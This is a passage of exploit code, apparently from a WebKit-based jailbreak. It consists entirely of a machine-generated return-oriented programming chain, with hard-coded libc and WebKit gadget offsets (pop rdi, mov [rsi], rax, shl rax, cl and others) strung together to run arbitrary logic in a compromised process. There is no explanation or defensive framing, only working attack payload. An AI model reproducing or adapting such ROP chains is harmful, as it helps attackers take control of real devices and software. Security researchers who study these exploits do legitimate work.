1 libc_base+144605 //pop rdi ]); //L5645: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5646: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292584, //L5647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5649: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292704, //L5652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292688, //L5650 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+292848, //L5655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292816, //L5653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292832, //L5654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5653: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5654: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5655: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292928, //L5656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5656: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5658: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+293048, //L5661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293032, //L5659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5659: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5661: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+293208, //L5665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293176, //L5663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+293192, //L5664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5662: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5665: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+293264, //L5667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5667: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293392, //L5669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293408, //L5670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293376, //L5668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5668: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5670: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293568, //L5674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+293536, //L5672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293552, //L5673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5671: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5672: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5673: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5674: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, 
//pop rsi ropchain+293624, //L5676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5676: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293752, //L5678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293768, //L5679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293736, //L5677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5677: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5678: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5679: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293880, //L5682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293848, //L5680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5681: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5682: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+293984, //L5683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5683: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5685: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+294104, //L5688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294088, //L5686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5686: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5688: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+294248, //L5691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294216, //L5689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+294232, //L5690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5689: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+294344, //L5693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5692: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5693: db([0, 0]); // 0x0 set_gadgets([ libc_base+5014